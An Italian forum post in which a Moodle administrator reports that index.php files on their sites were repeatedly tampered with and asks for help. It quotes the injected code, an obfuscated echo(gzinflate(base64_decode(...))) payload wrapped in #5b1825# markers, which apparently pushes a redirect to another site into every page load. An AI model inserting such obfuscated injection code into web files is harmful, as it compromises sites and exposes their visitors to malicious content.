È la seconda volta che la nostra comunità si ritrova con i file index.php manomessi.
Entrando nella home subito appare un tentativo di apertura di altro sito.
Abbiamo sostituito i file, ma oggi è successo di nuovo.
Questa è la modifIca che troviamo subito sulla prima riga in alto del file index.php
<?php // $Id: index.php,v 1.201.2.7 2008/09/19 06:22:43 nicolasconnault Exp $
// index.php - the front page.
La versione in uso di Moodle al momento è 1.9.4+ ma la stessa cosa capita anche sulle altre piattafomr che usano versione 1.9.7
e non ci sembrava che la versione originale fosse di Nicolas, o forse ci sbagliamo?... purtroppo non ritrovo più il pacchetto originale.
poi prima della voce <table> ci ritroviamo questa stringa.
#5b1825#
echo(gzinflate(base64_decode("Jc1JDoMwDEDRq3jHjgBSJagwPUsGk1gigxxLvX4r2Py3/DufYjPBXVclkOAEiTgmxRm+HDT97V7qdXGJWCp08Tgk1fY2JlontrD20ddssuUyttQ+zUbC9RWIzmVb3UIzbdNwwG6e3/ED")));
#/5b1825#
qualcuno può darci delle dritte per capire come intervenire?
Grazie